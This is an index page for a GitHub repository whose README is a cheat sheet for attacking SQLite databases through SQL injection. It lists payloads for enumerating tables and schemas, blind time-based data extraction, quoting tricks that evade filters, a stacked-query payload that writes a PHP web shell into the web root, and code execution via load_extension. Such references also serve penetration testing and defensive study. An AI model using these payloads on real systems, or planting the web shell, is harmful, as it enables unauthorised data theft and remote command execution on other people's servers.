Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/unicornsasfuel/sqlite_sqli_cheat_sheet
A cheat sheet for attacking SQLite via SQLi
Last synced: 17 days ago
- Host: GitHub
- URL: https://github.com/unicornsasfuel/sqlite_sqli_cheat_sheet
- Owner: unicornsasfuel
- Created: 2016-04-18T23:48:50.000Z (over 8 years ago)
- Default Branch: master
- Last Pushed: 2016-04-19T17:00:16.000Z (over 8 years ago)
- Last Synced: 2023-02-26T17:17:20.060Z (over 1 year ago)
- Size: 2.93 KB
- Stars: 80
- Watchers: 4
- Forks: 15
- Open Issues: 0
Metadata Files:
- Readme: README.md
README
# SQLite SQL Injection Cheat Sheet
|If you need | You use |
|-----------------------------|:-------------------------------------------------------------------------------:|
|Concatenation | \|\| |
|Comments | -- |
|Conditionals | CASE WHEN key='value1' THEN 'something' WHEN key='value2' THEN 'somethingelse' END |
|Substring | substr(string,start,length) |
|Length | length(string) |
|Quotes without literal quotes| cast(X'27' as text) *--use X'22' for double quotes* |
|Table name enumeration | SELECT name FROM sqlite_master WHERE type='table' |
|Table schema enumeration | SELECT sql FROM sqlite_master WHERE type='table' |
|Time-based data extraction | cond='true' AND 1=randomblob(100000000) *--causes time delay if cond='true'* |
|File writing | 1';ATTACH DATABASE '/var/www/lol.php' AS lol; CREATE TABLE lol.pwn (dataz text); INSERT INTO lol.pwn (dataz) VALUES (' system($_GET['cmd']); ?>';-- *--requires either direct database access or (non-default) stacked query option enabled*|
|Arbitrary Code Execution | load\_extension(library\_file,entry\_point) *-- .dll for Windows, .so for 'nix. Requires non-default configuration*|

This work is based on http://atta.cked.me/home/sqlite3injectioncheatsheet